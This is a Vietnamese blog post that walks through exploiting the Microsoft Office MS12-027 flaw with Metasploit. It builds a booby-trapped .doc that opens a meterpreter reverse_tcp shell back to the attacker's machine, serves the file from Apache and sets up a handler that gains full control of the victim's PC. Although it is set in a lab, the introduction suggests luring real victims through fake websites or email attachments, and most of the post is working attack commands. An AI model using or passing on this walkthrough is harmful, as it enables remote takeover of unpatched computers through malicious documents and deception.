1 tháng 4, 2014

Xâm nhâp WindowsXP, Win7 qua lổ hỗng của Microsoft Office MS12-027

Các bạn tham khảo lỗi này tại:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …) máy nạn nhân đang sử dụng Microsoft Office 2007 (no-SP/SP1/SP2/SP3) trên Windows (XP SP3 / 7 SP1) English là máy nạn nhân sẽ bị “nhiễm độc”.


Mô hình bài Lab
Máy Hacker:
Hệ điều hành: Sử dụng Backtrack 5
IP: 192.168.119.132
Máy nạn nhân:
Hệ điều hành: Sử dụng Windows XP
IP: 192.168.119.129

Cách khai thác:

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf
msf > search ms12_027
copy đường dẫn, enter gõ use “dán đường dẫn vào”
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
Gõ lệnh show options để thấy những option của lỗi
msf  exploit(ms12_027_mscomctl_bof) > show options


Ở đây ta thấy bắt buộc phải tạo FILENAME
Lần lượt gõ các lệnh:
msf  exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc
Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích)
msf  exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp
msf  exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132
Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack.
msf  exploit(ms12_027_mscomctl_bof) > exploit
Gõ lệnh exploit để thực thi
msf  exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc /root/Desktop
ta copy file “filemadoc.doc” đã được tạo ra ngoài Desktop cho dễ sử dụng.


Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc chạy.

Upload file “filemadoc.doc” lên Webserver bằng cách đưa nó vào thư mục “/var/www”
Start Webserver ảo bằng lệnh
root@bt:~# service apache2 start
 * Starting web server apache2                                           [ OK ]

Tạo ra một trình lắng nghe
msf  exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.119.132
msf  exploit(handler) > exploit


Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta đã dựng và tải file “filemadoc.doc” về.
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.


Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn nhân


Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1040
Giờ ta có thể khai thác được máy nạn nhân
Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân.

Thanks!.

Không có nhận xét nào:

Đăng nhận xét